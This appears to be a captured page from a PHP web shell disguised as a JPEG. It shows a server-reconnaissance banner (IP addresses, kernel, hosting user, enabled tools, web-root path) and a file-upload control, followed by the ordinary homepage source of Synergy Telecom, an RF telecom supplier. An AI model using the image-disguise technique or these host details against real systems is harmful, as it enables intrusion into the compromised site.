���� JFIF fdasasfas213sdaf
Server IP : 88.222.243.122 / Your IP : 216.73.216.200 Web Server : LiteSpeed System : Linux in-mum-web669.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64 User : u479334040 ( 479334040) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u479334040/domains/rfconnector.info/public_html/ |
Upload File : |
<?php include ('includes/config.php'); function getCategories($con) { $query = "SELECT * FROM category WHERE parent_id = 0 LIMIT 8" ; // Fetch parent categories $result = mysqli_query($con, $query); if (!$result) { die("Category Query Failed: " . mysqli_error($con)); } return $result; } ?> <!doctype html> <html lang="en"> <head> <!-- :: Required Meta Tags --> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content=""> <meta name="keywords" content=""> <!-- :: Title --> <title>Synergy Telecom - Homepage</title> <?php include('include/assets.php') ?> </head> <body> <?php include('include/header.php') ?> <!-- Swiper --> <div class="swiper mySwiper mt-3"> <div class="swiper-wrapper"> <div class="swiper-slide"> <a href="welded-ss-thermowells.php"> <img src="img/banners/g1.gif" class="img-fluid" alt=""> </a> </div> <div class="swiper-slide"> <a href="welded-ss-thermowells.php"> <img src="img/banners/g2.gif" class="img-fluid" alt=""> </a> </div> <div class="swiper-slide"> <a href="welded-ss-thermowells.php"> <img src="img/banners/g3.gif" class="img-fluid" alt=""> </a> </div> </div> <div class="swiper-pagination"></div> </div> <!-- :: About US --> <section class="about-us home-2 py-100" id="start"> <div class="container"> <div class="row"> <div class="col-lg-6 col-12"> <div class="about-us-text-box"> <div class="sec-title home-2"> <h2>Welcome to Synergy Telecom</h2> <h3 class="text-uppercase">Leading Global Innovators in Telecommunications and RF Solutions</h3> <p class="sec-explain">Synergy Telecom is a distinguished global player in the field of telecommunications and RF solutions, established in 2000, turned Pvt Ltd in 2004 and headquartered in New Delhi, India. Operating at the pinnacle of international standards, Synergy Telecom provides a wide range of high-quality products and services to meet the evolving needs of the telecommunications industry. </p> </div> <h3>Company Overview</h3> <p class="my-3">Synergy Telecom specializes in</p> <ul> <li> <p><b>Telecom Equipment:</b> Including antennae, cable assemblies, microwave components, IoT and M2M learning, IBS and BTS installation materials, and solar passive components.</p> </li> <li> <p><b>Inventory Management:</b> Maintaining a large stock of fast-moving materials like cables, connectors, passive RF components, and installation materials.</p> </li> </ul> <h3>Key Clients and Approvals</h3> <p class="my-3">Synergy Telecom is an approved vendor for several prestigious organizations, including:</p> <ul> <li> <p> BEL (Bharat Electronics Limited)</p> </li> <li> <p> ITI (Indian Telephone Industries)</p> </li> </ul> <a class="btn-1 btn-3" href="about-us.php"><span>READ MORE</span></a> </div> </div> <div class="col-12 col-lg-6"> <img src="img/about-gif.gif" class="img-fluid" alt=""> </div> </div> </div> </section> <!-- :: Swivels and Swing Units --> <section class="team home-2 pb-4"> <div class="container"> <div class="sec-title home-2"> <div class="row"> <div class="col-lg-5"> <h2>Premium Products</h2> <h3 class="text-uppercase">Premium Products for Swivels and Swing Units</h3> </div> <div class="col-lg-7 d-flex align-items-center"> <p class="sec-explain">At Synergy Telecom, we offer a comprehensive range of high-quality Swivels and Swing Units designed to meet the diverse needs of various industries. Our product line includes Clutch-Style Swivels, Friction-Style Swivels, Key-Style Swivels, and Swing-Unit Swivels, each engineered for precision, durability, and reliable performance.</p> </div> </div> </div> <div class="row"> <?php // Fetch categories from the database $categories = getCategories($con); while ($cat = mysqli_fetch_assoc($categories)) { // Image Path: Checking if the category has an image or not $imagePath = 'product-admin/uploads/category/' . $cat['categoryImage']; if (empty($cat['categoryImage']) || !file_exists($imagePath)) { $imagePath = 'default-image.jpg'; // Default image if not found } ?> <div class="col-md-6 col-lg-3"> <div class="team-box"> <div class="img-box"> <img class="img-fluid" src="<?php echo $imagePath; ?>" alt="<?php echo htmlentities($cat['categoryName']); ?>" alt="01 team"> <div class="img-box-hover"> </div> </div> <div class="text-box text-center"> <h5><a href="subcategories.php?parent_id=<?php echo htmlentities($cat['id']); ?>"><?php echo htmlentities($cat['categoryName']); ?></a></h5> <span>Synergy Telecom</span> </div> </div> </div> <?php } ?> </div> </div> </section> <section class="mid-banner text-center"> <img src="img/banners/mid-banner.jpg" class="img-fluid" alt=""> </section> <!-- :: Provide --> <section class="provide home-2"> <div class="bg-section"> <div class="overlay overlay-3"></div> </div> <div class="container"> <div class="sec-title home-2"> <div class="row"> <div class="col-lg-5"> <h3 class="text-uppercase">Unmatched Excellence in Every Service, Every Time.</h3> </div> <div class="col-lg-7 d-flex align-items-center"> <p class="sec-explain"> With 28 years of industry expertise, our dedicated team ensures that every product, from stainless steel thermowells to intricate lighting accessories, meets your specific needs with precision and reliability. Experience the difference of superior craftsmanship and exceptional service with us.</p> </div> </div> </div> <div class="provide-core-list"> <div class="row"> <div class="col-md-6 col-lg-3"> <div class="provide-core-list-item"> <i class="ar-icons-idea"></i> <div class="item-content-box"> <h4>+28 Years Experience</h4> <p>28 years of expertise delivering unmatched quality and precision.</p> </div> </div> </div> <div class="col-md-6 col-lg-3"> <div class="provide-core-list-item"> <i class=" ar-icons-foreman"></i> <div class="item-content-box"> <h4>Best Team Member</h4> <p>The Best Team Member Dedicated, skilled, and essential for success.</p> </div> </div> </div> <div class="col-md-6 col-lg-3"> <div class="provide-core-list-item"> <i class="ar-icons-electricity"></i> <div class="item-content-box"> <h4>The Best Services</h4> <p>The Best Services Excellence, reliability, and innovation in every solution.</p> </div> </div> </div> <div class="col-md-6 col-lg-3"> <div class="provide-core-list-item"> <i class="ar-icons-forklift"></i> <div class="item-content-box"> <h4>Stainless Steel</h4> <p>Stainless Steel Durable, corrosion-resistant, and versatile for any application.</p> </div> </div> </div> </div> </div> <!-- :: Qoute Box --> <div class="quote-box"> <div class="row"> <div class="col-lg-4"> <!-- :: Map --> <div class="map-box"> <iframe src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3501.7317226247865!2d77.06706467522594!3d28.637801583841863!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x390d05005daf9587%3A0x41f494d4efcdafd8!2sSaini%20Chowk!5e0!3m2!1sen!2sin!4v1727955396816!5m2!1sen!2sin"></iframe> </div> </div> <div class="col-lg-8"> <div class="sec-title home-2"> <h3>Get in Touch for Expert Solutions</h3> <p class="sec-explain">Your inquiries answered with precision and promptness.</p> </div> <?php include 'form.php'; ?> </div> </div> </div> </div> </section> <!-- :: Projects --> <section class="projects home-2 py-100-70"> <div class="container"> <div class="sec-title home-2"> <div class="row"> <div class="col-lg-5"> <h2>Explore Our Gallery</h2> <h3>Explore Our Craftsmanship and Innovation in Every Piece.</h3> </div> <div class="col-lg-5 d-flex align-items-center"> <p class="sec-explain">Discover the craftsmanship and quality that define Synergy Telecom INDUSTRIES. Our gallery showcases a curated selection of our finest products and projects, highlighting the precision, design, and durability that set us apart</p> </div> </div> </div> <div class="row"> <div class="col-md-6 col-lg-4"> <div class="projects-item"> <span></span> <div class="img-box"> <img class="img-fluid projects-item-img" src="img/gallery/g1.jpg" alt="01 projects"> </div> <div class="hover-box"> <div class="text-box"> <div class="tags"><a href="#">Synergy Telecom</a></div> <h4><a href="#">Click To Learn More</a></h4> </div> <ul class="projects-icon"> <li><a href="#"><i class="fas fa-link"></i></a></li> <li><a class="popup" href="img/gallery/g1.jpg"><i class="far fa-eye"></i></a></li> </ul> </div> </div> </div> <div class="col-md-6 col-lg-4"> <div class="projects-item"> <span></span> <div class="img-box"> <img class="img-fluid projects-item-img" src="img/gallery/2.jpg" alt="01 projects"> </div> <div class="hover-box"> <div class="text-box"> <div class="tags"><a href="#">Synergy Telecom</a></div> <h4><a href="#">Click To Learn More</a></h4> </div> <ul class="projects-icon"> <li><a href="#"><i class="fas fa-link"></i></a></li> <li><a class="popup" href="img/gallery/2.jpg"><i class="far fa-eye"></i></a></li> </ul> </div> </div> </div> <div class="col-md-6 col-lg-4"> <div class="projects-item"> <span></span> <div class="img-box"> <img class="img-fluid projects-item-img" src="img/gallery/3.jpg" alt="01 projects"> </div> <div class="hover-box"> <div class="text-box"> <div class="tags"><a href="#">Synergy Telecom</a></div> <h4><a href="#">Click To Learn More</a></h4> </div> <ul class="projects-icon"> <li><a href="#"><i class="fas fa-link"></i></a></li> <li><a class="popup" href="img/gallery/3.jpg"><i class="far fa-eye"></i></a></li> </ul> </div> </div> </div> <div class="col-md-6 col-lg-4"> <div class="projects-item"> <span></span> <div class="img-box"> <img class="img-fluid projects-item-img" src="img/gallery/4.jpg" alt="01 projects"> </div> <div class="hover-box"> <div class="text-box"> <div class="tags"><a href="#">Synergy Telecom</a></div> <h4><a href="#">Click To Learn More</a></h4> </div> <ul class="projects-icon"> <li><a href="#"><i class="fas fa-link"></i></a></li> <li><a class="popup" href="img/gallery/4.jpg"><i class="far fa-eye"></i></a></li> </ul> </div> </div> </div> <div class="col-md-6 col-lg-4"> <div class="projects-item"> <span></span> <div class="img-box"> <img class="img-fluid projects-item-img" src="img/gallery/5.jpg" alt="01 projects"> </div> <div class="hover-box"> <div class="text-box"> <div class="tags"><a href="#">Synergy Telecom</a></div> <h4><a href="#">Click To Learn More</a></h4> </div> <ul class="projects-icon"> <li><a href="#"><i class="fas fa-link"></i></a></li> <li><a class="popup" href="img/gallery/5.jpg"><i class="far fa-eye"></i></a></li> </ul> </div> </div> </div> <div class="col-md-6 col-lg-4"> <div class="projects-item"> <span></span> <div class="img-box"> <img class="img-fluid projects-item-img" src="img/gallery/6.jpg" alt="01 projects"> </div> <div class="hover-box"> <div class="text-box"> <div class="tags"><a href="#">Synergy Telecom</a></div> <h4><a href="#">Click To Learn More</a></h4> </div> <ul class="projects-icon"> <li><a href="#"><i class="fas fa-link"></i></a></li> <li><a class="popup" href="img/gallery/6.jpg"><i class="far fa-eye"></i></a></li> </ul> </div> </div> </div> <div class="col-md-6 col-lg-4"> <div class="projects-item"> <span></span> <div class="img-box"> <img class="img-fluid projects-item-img" src="img/gallery/8.jpg" alt="01 projects"> </div> <div class="hover-box"> <div class="text-box"> <div class="tags"><a href="#">Synergy Telecom</a></div> <h4><a href="#">Click To Learn More</a></h4> </div> <ul class="projects-icon"> <li><a href="#"><i class="fas fa-link"></i></a></li> <li><a class="popup" href="img/gallery/8.jpg"><i class="far fa-eye"></i></a></li> </ul> </div> </div> </div> <div class="col-md-6 col-lg-4"> <div class="projects-item"> <span></span> <div class="img-box"> <img class="img-fluid projects-item-img" src="img/gallery/9.jpg" alt="01 projects"> </div> <div class="hover-box"> <div class="text-box"> <div class="tags"><a href="#">Synergy Telecom</a></div> <h4><a href="#">Click To Learn More</a></h4> </div> <ul class="projects-icon"> <li><a href="#"><i class="fas fa-link"></i></a></li> <li><a class="popup" href="img/gallery/9.jpg"><i class="far fa-eye"></i></a></li> </ul> </div> </div> </div> <div class="col-md-6 col-lg-4"> <div class="projects-item"> <span></span> <div class="img-box"> <img class="img-fluid projects-item-img" src="img/gallery/10.jpg" alt="01 projects"> </div> <div class="hover-box"> <div class="text-box"> <div class="tags"><a href="#">Synergy Telecom</a></div> <h4><a href="#">Click To Learn More</a></h4> </div> <ul class="projects-icon"> <li><a href="#"><i class="fas fa-link"></i></a></li> <li><a class="popup" href="img/gallery/10.jpg"><i class="far fa-eye"></i></a></li> </ul> </div> </div> </div> <div class="col-md-6 col-lg-4"> <div class="projects-item"> <span></span> <div class="img-box"> <img class="img-fluid projects-item-img" src="img/gallery/11.jpg" alt="01 projects"> </div> <div class="hover-box"> <div class="text-box"> <div class="tags"><a href="#">Synergy Telecom</a></div> <h4><a href="#">Click To Learn More</a></h4> </div> <ul class="projects-icon"> <li><a href="#"><i class="fas fa-link"></i></a></li> <li><a class="popup" href="img/gallery/11.jpg"><i class="far fa-eye"></i></a></li> </ul> </div> </div> </div> <div class="col-md-6 col-lg-4"> <div class="projects-item"> <span></span> <div class="img-box"> <img class="img-fluid projects-item-img" src="img/gallery/12.jpg" alt="01 projects"> </div> <div class="hover-box"> <div class="text-box"> <div class="tags"><a href="#">Synergy Telecom</a></div> <h4><a href="#">Click To Learn More</a></h4> </div> <ul class="projects-icon"> <li><a href="#"><i class="fas fa-link"></i></a></li> <li><a class="popup" href="img/gallery/12.jpg"><i class="far fa-eye"></i></a></li> </ul> </div> </div> </div> <div class="col-md-6 col-lg-4"> <div class="projects-item"> <span></span> <div class="img-box"> <img class="img-fluid projects-item-img" src="img/gallery/7.jpg" alt="01 projects"> </div> <div class="hover-box"> <div class="text-box"> <div class="tags"><a href="#">Synergy Telecom</a></div> <h4><a href="#">Click To Learn More</a></h4> </div> <ul class="projects-icon"> <li><a href="#"><i class="fas fa-link"></i></a></li> <li><a class="popup" href="img/gallery/7.jpg"><i class="far fa-eye"></i></a></li> </ul> </div> </div> </div> </div> </div> </section> <?php include('include/footer.php') ?>